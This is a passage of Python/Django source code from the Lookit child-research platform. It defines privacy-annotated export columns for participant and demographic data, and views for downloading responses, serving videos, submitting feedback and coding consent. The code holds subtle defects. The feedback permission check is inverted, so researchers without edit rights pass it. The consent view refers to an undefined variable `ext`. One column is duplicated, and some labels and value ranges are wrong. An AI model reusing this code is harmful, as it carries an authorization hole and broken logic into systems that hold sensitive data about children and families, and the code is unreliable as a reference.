extractor=lambda resp: resp.withdrawn,
name="Withdrawn",
),
ResponseDataColumn(
id="response__parent_feedback",
description=(
"Freeform parent feedback entered into the exit survey, if any. This field may incidentally contain "
"identifying or sensitive information depending on what parents say, so it should be scrubbed or "
"omitted from published data."
),
extractor=lambda resp: resp.parent_feedback,
name="Parent feedback",
),
ResponseDataColumn(
id="response__birthdate_difference",
description=(
"Difference between birthdate entered in exit survey, if any, and birthdate of registered child "
"participating. Positive values mean that the birthdate from the exit survey is LATER. Blank if "
"no birthdate available from the exit survey."
),
extractor=lambda resp: resp.birthdate_difference,
name="Birthdate difference",
),
ResponseDataColumn(
id="response__video_privacy",
description=(
"Privacy level for videos selected during the exit survey, if the parent completed the exit survey. "
"Possible levels are 'private' (only people listed on your IRB protocol can view), 'scientific' "
"(can share for scientific/educational purposes), and 'public' (can also share for publicity). "
"In no cases may videos be shared for commercial purposes. If this is missing (e.g., family stopped "
"just after the consent form and did not complete the exit survey), you must treat the video as "
"private."
),
extractor=lambda resp: resp.privacy,
name="Video privacy level",
),
ResponseDataColumn(
id="response__databrary",
description=(
"Whether the parent agreed to share video data on Databrary - 'yes' or 'no'. If missing, you must "
"treat the video as if 'no' were selected. If 'yes', the video privacy selections also apply to "
"authorized Databrary users."
),
extractor=lambda resp: resp.databrary,
name="Databrary sharing",
),
ResponseDataColumn(
id="response__is_preview",
description=(
"Whether this response was generated by a researcher previewing the experiment. Preview data should "
"not be used in any actual analyses."
),
extractor=lambda resp: resp.is_preview,
name="Preview",
),
ResponseDataColumn(
id="consent__ruling",
description=(
"Most recent consent video ruling: one of 'accepted' (consent has been reviewed and judged to indidate "
"informed consent), 'rejected' (consent has been reviewed and judged not to indicate informed "
"consent -- e.g., video missing or parent did not read statement), or 'pending' (no current judgement, "
"e.g. has not been reviewed yet or waiting on parent email response')"
),
extractor=lambda resp: resp.most_recent_ruling,
),
ResponseDataColumn(
id="consent__arbiter",
description="Name associated with researcher account that made the most recent consent ruling",
extractor=lambda resp: resp.most_recent_ruling_arbiter,
),
ResponseDataColumn(
id="consent__time",
description="Timestamp of most recent consent ruling, format e.g. 2019-12-09 20:40",
extractor=lambda resp: resp.most_recent_ruling_date,
),
ResponseDataColumn(
id="consent__comment",
description=(
"Comment associated with most recent consent ruling (may be used to track e.g. any cases where consent "
"was confirmed by email)"
),
extractor=lambda resp: resp.most_recent_ruling_comment,
),
ResponseDataColumn(
id="consent__time",
description="Timestamp of most recent consent ruling, format e.g. 2019-12-09 20:40",
extractor=lambda resp: resp.most_recent_ruling_date,
),
ResponseDataColumn(
id="study__uuid",
description="Unique identifier of study associated with this response. Same for all responses to a given Lookit study.",
extractor=lambda resp: str(resp.study.uuid),
),
ResponseDataColumn(
id="participant__global_id",
description=(
"Unique identifier for family account associated with this response. Will be the same for multiple "
"responses from a child and for siblings, and across different studies. MUST BE REDACTED FOR "
"PUBLICATION because this allows identification of families across different published studies, which "
"may have unintended privacy consequences. Researchers can use this ID to match participants across "
"studies (subject to their own IRB review), but would need to generate their own random participant "
"IDs for publication in that case. Use participant_hashed_id as a publication-safe alternative if "
"only analyzing data from one Lookit study."
),
extractor=lambda resp: str(resp.child.user.uuid),
optional=True,
name="Parent global ID",
include_by_default=False,
identifiable=True,
),
ResponseDataColumn(
id="participant__hashed_id",
description=(
"Identifier for family account associated with this response. Will be the same for multiple responses "
"from a child and for siblings, but is unique to this study. This may be published directly."
),
extractor=lambda resp: hash_id(
resp.child.user.uuid,
resp.study.uuid,
resp.study.salt,
resp.study.hash_digits,
),
name="Parent ID",
),
ResponseDataColumn(
id="participant__nickname",
description=(
"Nickname associated with the family account for this response - generally the mom or dad's name. "
"Must be redacted for publication."
),
extractor=lambda resp: resp.child.user.nickname,
optional=True,
name="Parent name",
include_by_default=False,
identifiable=True,
),
ResponseDataColumn(
id="child__global_id",
description=(
"Primary unique identifier for the child associated with this response. Will be the same for multiple "
"responses from one child, even across different Lookit studies. MUST BE REDACTED FOR PUBLICATION "
"because this allows identification of children across different published studies, which may have "
"unintended privacy consequences. Researchers can use this ID to match participants across studies "
"(subject to their own IRB review), but would need to generate their own random participant IDs for "
"publication in that case. Use child_hashed_id as a publication-safe alternative if only analyzing "
"data from one Lookit study."
),
extractor=lambda resp: str(resp.child.uuid),
optional=True,
name="Child global ID",
include_by_default=False,
identifiable=True,
),
ResponseDataColumn(
id="child__hashed_id",
description=(
"Identifier for child associated with this response. Will be the same for multiple responses from a "
"child, but is unique to this study. This may be published directly."
),
extractor=lambda resp: hash_id(
resp.child.uuid, resp.study.uuid, resp.study.salt, resp.study.hash_digits
),
name="Child ID",
),
ResponseDataColumn(
id="child__name",
description=(
"Nickname for the child associated with this response. Not necessarily a real name (we encourage "
"initials, nicknames, etc. if parents aren't comfortable providing a name) but must be redacted for "
"publication of data."
),
extractor=lambda resp: resp.child.given_name,
optional=True,
name="Child name",
include_by_default=False,
identifiable=True,
),
ResponseDataColumn(
id="child__birthday",
description=(
"Birthdate of child associated with this response. Must be redacted for publication of data (switch to "
"age at time of participation; either use rounded age, jitter the age, or redact timestamps of "
"participation)."
),
extractor=lambda resp: resp.child.birthday,
optional=True,
name="Birthdate",
include_by_default=False,
identifiable=True,
),
ResponseDataColumn(
id="child__age_in_days",
description=(
"Age in days at time of response of child associated with this response, exact. This can be used in "
"conjunction with timestamps to calculate the child's birthdate, so must be jittered or redacted prior "
"to publication unless no timestamp information is shared."
),
extractor=lambda resp: (resp.date_created.date() - resp.child.birthday).days,
optional=True,
name="Age in days",
include_by_default=False,
identifiable=True,
),
ResponseDataColumn(
id="child__age_rounded",
description=(
"Age in days at time of response of child associated with this response, rounded to the nearest 10 "
"days if under 1 year old and to the nearest 30 days if over 1 year old. May be published; however, if "
"you have more than a few sessions per participant it would be possible to infer the exact age in days "
"(and therefore birthdate) with some effort. In this case you might consider directly jittering "
"birthdates."
),
extractor=lambda resp: str(
round_age(int((resp.date_created.date() - resp.child.birthday).days))
)
if (resp.date_created and resp.child.birthday)
else "",
optional=True,
name="Rounded age",
include_by_default=True,
identifiable=False,
),
ResponseDataColumn(
id="child__gender",
description=(
"Parent-identified gender of child, one of 'm' (male), 'f' (female), 'o' (other), or 'na' (prefer not "
"to answer)"
),
extractor=lambda resp: resp.child.gender,
optional=True,
name="Child gender",
include_by_default=True,
identifiable=False,
),
ResponseDataColumn(
id="child__age_at_birth",
description=(
"Gestational age at birth in weeks. One of '40 or more weeks', '39 weeks' through '24 weeks', "
"'Under 24 weeks', or 'Not sure or prefer not to answer'"
),
extractor=lambda resp: resp.child.age_at_birth,
optional=True,
name="Child gestational age",
include_by_default=True,
identifiable=False,
),
ResponseDataColumn(
id="child__language_list",
description="List of languages spoken (using language codes in Lookit docs), separated by spaces",
extractor=lambda resp: resp.child.language_list,
optional=True,
name="Child languages",
include_by_default=True,
identifiable=False,
),
ResponseDataColumn(
id="child__condition_list",
description="List of child characteristics (using condition/characteristic codes in Lookit docs), separated by spaces",
extractor=lambda resp: resp.child.condition_list,
optional=True,
name="Child conditions",
include_by_default=True,
identifiable=False,
),
ResponseDataColumn(
id="child__additional_information",
description=(
"Free response 'anything else you'd like us to know' field on child registration form for child "
"associated with this response. Should be redacted or reviewed prior to publication as it may include "
"names or other identifying information."
),
extractor=lambda resp: resp.child.additional_information,
optional=True,
name="Child additional information",
include_by_default=True,
identifiable=True,
),
ResponseDataColumn(
id="response__sequence",
description=(
"Each response_sequence.N field (response_sequence.0, response_sequence.1, etc.) gives the ID of the "
"Nth frame displayed during the session associated with this response. Responses may have different "
"sequences due to randomization or if a participant leaves early."
),
extractor=lambda resp: resp.sequence,
name="Response sequence",
),
ResponseDataColumn(
id="response__conditions",
description=(
"RESEARCHERS: EXPAND THIS SECTION BASED ON YOUR INDIVIDUAL STUDY. Each set of "
"response_conditions.N.(...) fields give information about condition assignment during a particular "
"frame of this study. response_conditions.0.frameName is the frame ID (corresponding to a value in "
"response_sequence) where the randomization occurred. Additional fields such as "
"response_conditions.0.conditionNum depend on the specific randomizer frames used in this study."
),
extractor=lambda resp: [
{**{"frameName": cond_frame}, **conds}
for (cond_frame, conds) in resp.conditions.items()
],
),
]
# Columns for demographic data downloads. Extractor functions expect Response values dict,
# rather than instance.
DEMOGRAPHIC_COLUMNS = [
ResponseDataColumn(
id="response__uuid",
description=(
"Primary unique identifier for response. Can be used to match demographic data to response data "
"and video filenames; must be redacted prior to publication if videos are also published."
),
extractor=lambda resp: str(resp["uuid"]),
name="Response UUID",
),
ResponseDataColumn(
id="participant__global_id",
description=(
"Unique identifier for family account associated with this response. Will be the same for multiple "
"responses from a child and for siblings, and across different studies. MUST BE REDACTED FOR "
"PUBLICATION because this allows identification of families across different published studies, "
"which may have unintended privacy consequences. Researchers can use this ID to match participants "
"across studies (subject to their own IRB review), but would need to generate their own random "
"participant IDs for publication in that case. Use participant__hashed_id as a publication-safe "
"alternative if only analyzing data from one Lookit study."
),
extractor=lambda resp: str(resp["child__user__uuid"]),
optional=True,
name="Parent global ID",
include_by_default=False,
identifiable=True,
),
ResponseDataColumn(
id="participant__hashed_id",
description=(
"Identifier for family account associated with this response. Will be the same for multiple "
"responses from a child and for siblings, but is unique to this study. This may be published "
"directly."
),
extractor=lambda resp: hash_participant_id(resp),
name="Participant ID",
),
ResponseDataColumn(
id="demographic__hashed_id",
description=(
"Identifier for this demographic snapshot. Changes upon updates to the demographic form, "
"so may vary within the same participant across responses."
),
extractor=lambda resp: hash_demographic_id(resp),
name="Demographic ID",
),
ResponseDataColumn(
id="demographic__date_created",
description=(
"Timestamp of creation of the demographic snapshot associated with this response, in format e.g. "
"2019-10-02 21:39:03.713283+00:00"
),
extractor=lambda resp: str(resp["demographic_snapshot__created_at"]),
name="Date created",
),
ResponseDataColumn(
id="demographic__number_of_children",
description="Response to 'How many children do you have?'; options 0-10 or >10 (More than 10)",
extractor=lambda resp: resp["demographic_snapshot__number_of_children"],
name="Number of children",
),
ResponseDataColumn(
id="demographic__child_rounded_ages",
description=(
"List of rounded ages based on child birthdays entered in demographic form (not based on children "
"registered). Ages are at time of response for this row, in days, rounded to nearest 10 for ages "
"under 1 year and nearest 30 otherwise. In format e.g. [60, 390]"
),
extractor=lambda resp: round_ages_from_birthdays(
resp["demographic_snapshot__child_birthdays"], resp["date_created"]
),
name="Child ages rounded",
),
ResponseDataColumn(
id="demographic__languages_spoken_at_home",
description="Freeform response to 'What language(s) does your family speak at home?'",
extractor=lambda resp: resp["demographic_snapshot__languages_spoken_at_home"],
name="Languages spoken at home",
),
ResponseDataColumn(
id="demographic__number_of_guardians",
description="Response to 'How many parents/guardians do your children live with?' - 1, 2, 3> [3 or more], varies",
extractor=lambda resp: resp["demographic_snapshot__number_of_guardians"],
name="Number of guardians",
),
ResponseDataColumn(
id="demographic__number_of_guardians_explanation",
description=(
"Freeform response to 'If the answer varies due to shared custody arrangements or travel, please "
"enter the number of parents/guardians your children are usually living with or explain.'"
),
extractor=lambda resp: resp[
"demographic_snapshot__number_of_guardians_explanation"
],
name="Number of guardians explanation",
),
ResponseDataColumn(
id="demographic__race_identification",
description=(
"Comma-separated list of all values checked for question 'What category(ies) does your family "
"identify as?', from list: White; Hispanic, Latino, or Spanish origin; Black or African American; "
"Asian; American Indian or Alaska Native; Middle Eastern or North African; Native Hawaiian or "
"Other Pacific Islander; Another race, ethnicity, or origin"
),
extractor=lambda resp: resp["demographic_snapshot__race_identification"],
name="Race",
),
ResponseDataColumn(
id="demographic__parent_age",
description=(
"Parent's response to question 'What is your age?'; options are <18, 18-21, 22-24, 25-29, 30-34, "
"35-39, 40-44, 45-49, 50s, 60s, >70"
),
extractor=lambda resp: resp["demographic_snapshot__age"],
name="Parent age",
),
ResponseDataColumn(
id="demographic__parent_gender",
description=(
"Parent's response to question 'What is your gender?'; options are m [male], f [female], o "
"[other], na [prefer not to answer]"
),
extractor=lambda resp: resp["demographic_snapshot__gender"],
name="Parent age",
),
ResponseDataColumn(
id="demographic__education_level",
description=(
"Parent's response to question 'What is the highest level of education you've completed?'; options "
"are some [some or attending high school], hs [high school diploma or GED], col [some or attending "
"college], assoc [2-year college degree], bach [4-year college degree], grad [some or attending "
"graduate or professional school], prof [graduate or professional degree]"
),
extractor=lambda resp: resp["demographic_snapshot__education_level"],
name="Parent education level",
),
ResponseDataColumn(
id="demographic__spouse_education_level",
description=(
"Parent's response to question 'What is the highest level of education your spouse has "
"completed?'; options are some [some or attending high school], hs [high school diploma or GED], "
"col [some or attending college], assoc [2-year college degree], bach [4-year college degree], "
"grad [some or attending graduate or professional school], prof [graduate or professional degree], "
"na [not applicable - no spouse or partner]"
),
extractor=lambda resp: resp["demographic_snapshot__spouse_education_level"],
name="Parent education level",
),
ResponseDataColumn(
id="demographic__annual_income",
description=(
"Parent's response to question 'What is your approximate family yearly income (in US dollars)?'; "
"options are 0, 5000, 10000, 15000, 20000-19000 in increments of 10000, >200000, or na [prefer not "
"to answer]"
),
extractor=lambda resp: resp["demographic_snapshot__annual_income"],
name="Annual income",
),
ResponseDataColumn(
id="demographic__number_of_books",
description="Parent's response to question 'About how many children's books are there in your home?'; integer",
extractor=lambda resp: resp["demographic_snapshot__number_of_books"],
name="Number of books",
),
ResponseDataColumn(
id="demographic__additional_comments",
description="Parent's freeform response to question 'Anything else you'd like us to know?'",
extractor=lambda resp: resp["demographic_snapshot__additional_comments"],
name="Additional comments",
),
ResponseDataColumn(
id="demographic__country",
description="Parent's response to question 'What country do you live in?'; 2-letter country code",
extractor=lambda resp: resp["demographic_snapshot__country"],
name="Country code",
),
ResponseDataColumn(
id="demographic__state",
description=(
"Parent's response to question 'What state do you live in?' if country is US; 2-letter state "
"abbreviation"
),
extractor=lambda resp: resp["demographic_snapshot__state"],
name="US State",
),
ResponseDataColumn(
id="demographic__density",
description=(
"Parent's response to question 'How would you describe the area where you live?'; options are "
"urban, suburban, rural"
),
extractor=lambda resp: resp["demographic_snapshot__density"],
name="Density",
),
ResponseDataColumn(
id="demographic__lookit_referrer",
description="Parent's freeform response to question 'How did you hear about Lookit?'",
extractor=lambda resp: resp["demographic_snapshot__lookit_referrer"],
name="How you heard about Lookit",
),
]
# Which headers from the response data summary should go in the child data downloads
CHILD_CSV_HEADERS = [
col.id
for col in RESPONSE_COLUMNS
if col.id.startswith("child__") or col.id.startswith("participant__")
]
IDENTIFIABLE_DATA_HEADERS = {col.id for col in RESPONSE_COLUMNS if col.identifiable}
def get_response_headers(
selected_header_ids: Union[Set, List],
all_available_header_ids: Union[Set, KeysView],
) -> List:
unselected_optional_ids = {
col.id
for col in RESPONSE_COLUMNS
if col.optional and col.id not in selected_header_ids
}
selected_standard_header_ids = [
col.id
for col in RESPONSE_COLUMNS[0:-2]
if col.id not in unselected_optional_ids
]
return selected_standard_header_ids + sorted(
list(
all_available_header_ids
- set(selected_standard_header_ids)
- unselected_optional_ids
)
)
def get_demographic_headers(selected_header_ids=None) -> List[str]:
if selected_header_ids is None:
selected_header_ids = {}
return [
col.id
for col in DEMOGRAPHIC_COLUMNS
if col.id in selected_header_ids or not col.optional
]
def construct_response_dictionary(
resp, columns, optional_headers, include_exp_data=True
):
if optional_headers is None:
optional_headers = {}
resp_dict = {}
for col in columns:
if col.id in optional_headers or not col.optional:
try:
object_name, field_name = col.id.split("__")
if object_name in resp_dict:
resp_dict[object_name][field_name] = col.extractor(resp)
else:
resp_dict[object_name] = {field_name: col.extractor(resp)}
except ValueError:
resp_dict[col.id] = col.extractor(resp)
# Include exp_data field in dictionary?
if include_exp_data:
resp_dict["exp_data"] = resp.exp_data
return resp_dict
class FrameDataRow(NamedTuple):
response_uuid: str
child_hashed_id: str
frame_id: str
event_number: str
key: str
value: str
FRAME_DATA_HEADER_DESCRIPTIONS = {
"response_uuid": "Unique identifier for this response; can be matched to summary data and video filenames",
"child_hashed_id": (
"Hashed identifier for the child associated with this response; can be matched to summary data "
"child_hashed_id. This random ID may be published directly; it is specific to this study. If you "
"need to match children across multiple studies, use the child_global_id."
),
"frame_id": (
"Identifier for the particular frame responsible for this data; matches up to an element in the "
"response_sequence in the summary data file"
),
"event_number": (
"Index of the event responsible for this data, if this is an event. Indexes start from 0 within each "
"frame (and within global data) within each response. Blank for non-event data."
),
"key": "Label for a piece of data collected during this frame - for example, 'formData.child_favorite_animal'",
"value": "Value of the data associated with this key (of the indexed event if applicable) - for example, 'giraffe'",
}
def get_frame_data(resp: Union[Response, Dict]) -> List[FrameDataRow]:
if type(resp) is not dict:
resp = {
"child__uuid": resp.child.uuid,
"study__uuid": resp.study.uuid,
"study__salt": resp.study.salt,
"study__hash_digits": resp.study.hash_digits,
"uuid": resp.uuid,
"exp_data": resp.exp_data,
"global_event_timings": resp.global_event_timings,
}
frame_data_tuples = []
child_hashed_id = hash_id(
resp["child__uuid"],
resp["study__uuid"],
resp["study__salt"],
resp["study__hash_digits"],
)
# First add all of the global event timings as events with frame_id "global"
for (iEvent, event) in enumerate(resp["global_event_timings"]):
for (key, value) in event.items():
frame_data_tuples.append(
FrameDataRow(
child_hashed_id=child_hashed_id,
response_uuid=str(resp["uuid"]),
frame_id="global",
key=key,
event_number=str(iEvent),
value=value,
)
)
# Next add all data in exp_data
event_prefix = "eventTimings."
for frame_id, frame_data in resp["exp_data"].items():
for (key, value) in flatten_dict(frame_data).items():
# Process event data separately and include event_number within frame
if key.startswith(event_prefix):
key_pieces = key.split(".")
frame_data_tuples.append(
FrameDataRow(
child_hashed_id=child_hashed_id,
response_uuid=str(resp["uuid"]),
frame_id=frame_id,
key=".".join(key_pieces[2:]),
event_number=str(key_pieces[1]),
value=value,
)
)
# omit frameType values from CSV
elif key == "frameType":
continue
# Omit the DOB from any exit survey
elif key == "birthDate" and frame_data.get("frameType", None) == "EXIT":
continue
# Omit empty generatedProperties values from CSV
elif key == "generatedProperties" and not value:
continue
# For all other data, create a regular entry with frame_id and no event #
else:
frame_data_tuples.append(
FrameDataRow(
child_hashed_id=child_hashed_id,
response_uuid=str(resp["uuid"]),
frame_id=frame_id,
key=key,
event_number="",
value=value,
)
)
return frame_data_tuples
def build_framedata_dict_csv(writer, responses):
response_paginator = Paginator(responses, RESPONSE_PAGE_SIZE)
unique_frame_ids = set()
event_keys = set()
unique_frame_keys_dict = {}
for page_num in response_paginator.page_range:
page_of_responses = response_paginator.page(page_num)
for resp in page_of_responses:
this_resp_data = get_frame_data(resp)
these_ids = {
d.frame_id.partition("-")[2]
for d in this_resp_data
if not d.frame_id == "global"
}
event_keys = event_keys | {
d.key for d in this_resp_data if d.event_number != ""
}
unique_frame_ids = unique_frame_ids | these_ids
for frame_id in these_ids:
these_keys = {
d.key
for d in this_resp_data
if d.frame_id.partition("-")[2] == frame_id and d.event_number == ""
}
if frame_id in unique_frame_keys_dict:
unique_frame_keys_dict[frame_id] = (
unique_frame_keys_dict[frame_id] | these_keys
)
else:
unique_frame_keys_dict[frame_id] = these_keys
# Start with general descriptions of high-level headers (child_id, response_id, etc.)
writer.writerows(
[
{"column": header, "description": description}
for (header, description) in FRAME_DATA_HEADER_DESCRIPTIONS.items()
]
)
writer.writerow(
{
"possible_frame_id": "global",
"frame_description": "Data not associated with a particular frame",
}
)
# Add placeholders to describe each frame type
unique_frame_ids = sorted(list(unique_frame_ids))
for frame_id in unique_frame_ids:
writer.writerow(
{
"possible_frame_id": "*-" + frame_id,
"frame_description": "RESEARCHER: INSERT FRAME DESCRIPTION",
}
)
unique_frame_keys = sorted(list(unique_frame_keys_dict[frame_id]))
for k in unique_frame_keys:
writer.writerow(
{
"possible_frame_id": "*-" + frame_id,
"possible_key": k,
"key_description": "RESEARCHER: INSERT DESCRIPTION OF WHAT THIS KEY MEANS IN THIS FRAME",
}
)
event_keys = sorted(list(event_keys))
event_key_stock_descriptions = {
"eventType": (
"Descriptor for this event; determines what other data is available. Global event 'exitEarly' records "
"cases where the participant attempted to exit the study early by closing the tab/window or pressing F1 "
"or ctrl-X. RESEARCHER: INSERT DESCRIPTIONS OF PARTICULAR EVENTTYPES USED IN YOUR STUDY. (Note: you can "
"find a list of events recorded by each frame in the frame documentation at "
"https://lookit.github.io/ember-lookit-frameplayer, under the Events header.)"
),
"exitType": (
"Used in the global event exitEarly. Only value stored at this point is 'browserNavigationAttempt'"
),
"lastPageSeen": (
"Used in the global event exitEarly. Index of the frame the participant was on before exit attempt."
),
"pipeId": (
"Recorded by any event in a video-capture-equipped frame. Internal video ID used by Pipe service; only "
"useful for troubleshooting in rare cases."
),
"streamTime": (
"Recorded by any event in a video-capture-equipped frame. Indicates time within webcam "
"video (videoId) to nearest 0.1 second. If recording has not started yet, may be 0 or null."
),
"timestamp": "Recorded by all events. Timestamp of event in format e.g. 2019-11-07T17:14:43.626Z",
"videoId": (
"Recorded by any event in a video-capture-equipped frame. Filename (without .mp4 extension) of video "
"currently being recorded."
),
}
for k in event_keys:
writer.writerow(
{
"possible_frame_id": "any (event data)",
"possible_key": k,
"key_description": event_key_stock_descriptions.get(
k, "RESEARCHER: INSERT DESCRIPTION OF WHAT THIS EVENT KEY MEANS"
),
}
)
def build_single_response_framedata_csv(response):
this_resp_data = get_frame_data(response)
output, writer = csv_namedtuple_writer(FrameDataRow)
writer.writerows(this_resp_data)
return output.getvalue()
class ResponseDownloadMixin(CanViewStudyResponsesMixin, MultipleObjectMixin):
model = Response
paginate_by = 10
ordering = "id"
def get_queryset(self):
study = self.study
return study.responses_for_researcher(self.request.user).order_by(
self.get_ordering()
)
class DemographicDownloadMixin(CanViewStudyResponsesMixin, MultipleObjectMixin):
model = Response
paginate_by = 10
ordering = "id"
def get_queryset(self):
study = self.study
return (
study.responses_for_researcher(self.request.user)
.order_by(self.get_ordering())
.select_related("child", "child__user", "study", "demographic_snapshot")
.values(
"uuid",
"date_created",
"child__user__uuid",
"study__uuid",
"study__salt",
"study__hash_digits",
"demographic_snapshot__uuid",
"demographic_snapshot__created_at",
"demographic_snapshot__number_of_children",
"demographic_snapshot__child_birthdays",
"demographic_snapshot__languages_spoken_at_home",
"demographic_snapshot__number_of_guardians",
"demographic_snapshot__number_of_guardians_explanation",
"demographic_snapshot__race_identification",
"demographic_snapshot__age",
"demographic_snapshot__gender",
"demographic_snapshot__education_level",
"demographic_snapshot__spouse_education_level",
"demographic_snapshot__annual_income",
"demographic_snapshot__number_of_books",
"demographic_snapshot__additional_comments",
"demographic_snapshot__country",
"demographic_snapshot__state",
"demographic_snapshot__density",
"demographic_snapshot__lookit_referrer",
"demographic_snapshot__extra",
)
)
class StudyResponsesList(ResponseDownloadMixin, generic.ListView):
template_name = "studies/study_responses.html"
def get_ordering(self):
orderby = self.request.GET.get("sort", "id")
return orderby.replace("id", "child__id").replace("status", "completed")
def get_queryset(self):
return (
super()
.get_queryset()
.prefetch_related(
"consent_rulings__arbiter",
Prefetch(
"feedback",
queryset=Feedback.objects.select_related("researcher").order_by(
"-id"
),
),
)
)
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context["study"] = study = self.study
paginated_responses = context["object_list"]
columns_included_in_summary = study.columns_included_in_summary()
columns_included_in_table = [
"child__hashed_id",
"response__uuid",
"response__id",
"response__status",
"response__completed",
"response__is_preview",
]
response_data = []
for resp in paginated_responses:
# Info needed for table display of individual responses
this_resp_data = {
col.id: col.extractor(resp)
for col in RESPONSE_COLUMNS
if col.id in columns_included_in_table
}
# Exception - store actual date object for date created
this_resp_data["response__date_created"] = resp.date_created
# info needed for summary table shown at right
this_resp_data["summary"] = [
{
"name": col.name,
"value": col.extractor(resp),
"description": col.description,
}
for col in RESPONSE_COLUMNS
if col.id in columns_included_in_summary
]
this_resp_data["videos"] = resp.videos.values("pk", "full_name")
for v in this_resp_data["videos"]:
v["display_name"] = (
v["full_name"]
.replace("videoStream_{}_".format(study.uuid), "...")
.replace("_{}_".format(resp.uuid), "...")
)
response_data.append(this_resp_data)
context["response_data"] = response_data
context["data_options"] = [col for col in RESPONSE_COLUMNS if col.optional]
context["can_view_regular_responses"] = self.request.user.has_study_perms(
StudyPermission.READ_STUDY_RESPONSE_DATA, context["study"]
)
context["can_view_preview_responses"] = self.request.user.has_study_perms(
StudyPermission.READ_STUDY_PREVIEW_DATA, context["study"]
)
context["can_edit_feedback"] = self.request.user.has_study_perms(
StudyPermission.EDIT_STUDY_FEEDBACK, context["study"]
)
return context
def build_video_display_name(self, study_uuid, response_uuid, vid_name):
return ". . ." + ". . .".join(
vid_name.split(study_uuid + "_")[1].split("_" + response_uuid + "_")
)
class StudySingleResponseDownload(ResponseDownloadMixin, View):
def get(self, *args, **kwargs):
data_type = self.request.GET.get("data-type-selector", None)
if data_type not in ["json", "csv", "framedata"]:
raise SuspiciousOperation
response_id = self.request.GET.get("response_id", None)
try:
resp = self.get_queryset().get(pk=response_id)
except ObjectDoesNotExist:
raise SuspiciousOperation
study = self.study
header_options = set(self.request.GET.getlist("data_options"))
extension = "json" if data_type == "json" else "csv"
filename = "{}_{}{}.{}".format(
study_name_for_files(study.name),
str(resp.uuid),
"_frames"
if data_type == "json"
else "_identifiable"
if IDENTIFIABLE_DATA_HEADERS & header_options
else "",
extension,
)
if data_type == "json":
cleaned_data = json.dumps(
construct_response_dictionary(resp, RESPONSE_COLUMNS, header_options),
indent="\t",
default=str,
)
elif data_type == "csv":
row_data = flatten_dict(
{col.id: col.extractor(resp) for col in RESPONSE_COLUMNS}
)
header_list = get_response_headers(header_options, row_data.keys())
output, writer = csv_dict_output_and_writer(header_list)
writer.writerow(row_data)
cleaned_data = output.getvalue()
elif data_type == "framedata":
cleaned_data = build_single_response_framedata_csv(resp)
else:
raise SuspiciousOperation
response = HttpResponse(cleaned_data, content_type="text/{}".format(extension))
response["Content-Disposition"] = 'attachment; filename="{}"'.format(filename)
return response
class StudyResponseVideoAttachment(
ResearcherLoginRequiredMixin, UserPassesTestMixin, StudyLookupMixin, View
):
raise_exception = True
@cached_property
def video(self):
# Only select the video from consented videos for this study
return self.study.videos_for_consented_responses.get(
pk=self.kwargs.get("video")
)
def can_view_this_video(self):
user = self.request.user
study = self.study
video = self.video
return user.is_researcher and (
(
user.has_study_perms(StudyPermission.READ_STUDY_RESPONSE_DATA, study)
and not video.response.is_preview
)
or (
user.has_study_perms(StudyPermission.READ_STUDY_PREVIEW_DATA, study)
and video.response.is_preview
)
)
test_func = can_view_this_video
def get(self, request, *args, **kwargs):
video = self.video
download_url = video.download_url
if self.request.GET.get("mode") == "download":
r = requests.get(download_url)
response = FileResponse(
File.open(io.BytesIO(r.content)),
filename=video.filename,
as_attachment=True,
)
return response
return redirect(download_url)
class StudyResponseSubmitFeedback(StudyLookupMixin, UserPassesTestMixin, View):
def user_can_edit_feedback(self):
user = self.request.user
study = self.study
# First check user has permission to be editing feedback from this study at all
if not user.is_researcher and user.has_study_perms(
StudyPermission.EDIT_STUDY_FEEDBACK, study
):
return False
# Check that the feedback_id (if given) is from this study
feedback_id = self.request.POST.get("feedback_id", None)
if feedback_id:
try:
feedback = Feedback.objects.get(id=feedback_id)
except ObjectDoesNotExist:
return False
if feedback.response.study_id != study.pk:
return False
# Check that the response_id (if given) is from this study
response_id = self.request.POST.get("response_id", None)
if response_id:
try:
response = Response.objects.get(id=int(response_id))
except ObjectDoesNotExist:
return False
if response.study_id != study.pk:
return False
return True
test_func = user_can_edit_feedback
def post(self, request, *args, **kwargs):
form_data = self.request.POST
user = self.request.user
study = self.study
feedback_id = form_data.get("feedback_id", None)
comment = form_data.get("comment", "")
if feedback_id:
Feedback.objects.filter(id=feedback_id).update(comment=comment)
else:
response_id = int(form_data.get("response_id"))
Feedback.objects.create(
response_id=response_id, researcher=user, comment=comment
)
return HttpResponseRedirect(
reverse("exp:study-responses-list", kwargs=dict(pk=study.pk))
)
class StudyResponsesConsentManager(
ResearcherLoginRequiredMixin,
UserPassesTestMixin,
SingleObjectFetchProtocol[Study],
generic.DetailView,
):
template_name = "studies/study_responses_consent_ruling.html"
queryset = Study.objects.all()
raise_exception = True
def user_can_code_consent(self):
user = self.request.user
study = self.get_object()
return user.is_researcher and (
user.has_study_perms(StudyPermission.CODE_STUDY_CONSENT, study)
or user.has_study_perms(StudyPermission.CODE_STUDY_PREVIEW_CONSENT, study)
)
test_func = user_can_code_consent
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
# Need to prefetch our responses with consent-footage videos.
study = context["study"]
# TODO: technically should not grant access to consent videos for preview data unless has that perm
# (or should clearly indicate that code_study_consent means preview + actual data)
preview_only = not self.request.user.has_study_perms(
StudyPermission.CODE_STUDY_CONSENT, study
)
responses = get_responses_with_current_rulings_and_videos(
study.id, preview_only
)
context["loaded_responses"] = responses
context["summary_statistics"] = get_consent_statistics(study.id, preview_only)
# Using a map for arbitrarily structured data - lists and objects that we can't just trivially shove onto
response_key_value_store = {}
paginator = Paginator(responses, RESPONSE_PAGE_SIZE)
for page_num in paginator.page_range:
page_of_responses = paginator.page(page_num)
for response in page_of_responses:
response_json = response_key_value_store[str(response["uuid"])] = {}
response["uuid"] = str(response.pop("uuid"))
response_json["videos"] = response.pop("videos")
response_json["details"] = {
"general": {
"uuid": response["uuid"],
"global_event_timings": json.dumps(
response.pop("global_event_timings")
),
"sequence": json.dumps(response.pop("sequence")),
"completed": json.dumps(response.pop("completed")),
"date_created": str(response["date_created"]),
},
"participant": {
"hashed_id": hash_participant_id(response),
"uuid": str(response.pop("child__user__uuid")),
"nickname": response.pop("child__user__nickname"),
},
"child": {
"hashed_id": hash_child_id(response),
"uuid": str(response.pop("child__uuid")),
"name": response.pop("child__given_name"),
"birthday": str(response.pop("child__birthday")),
"gender": response.pop("child__gender"),
"additional_information": response.pop(
"child__additional_information"
),
},
}
ext["response_key_value_store"] = json.dumps(response_key_value_store)
return context
def post(self, request, *args, **kwargs):
form_data = self.request.POST
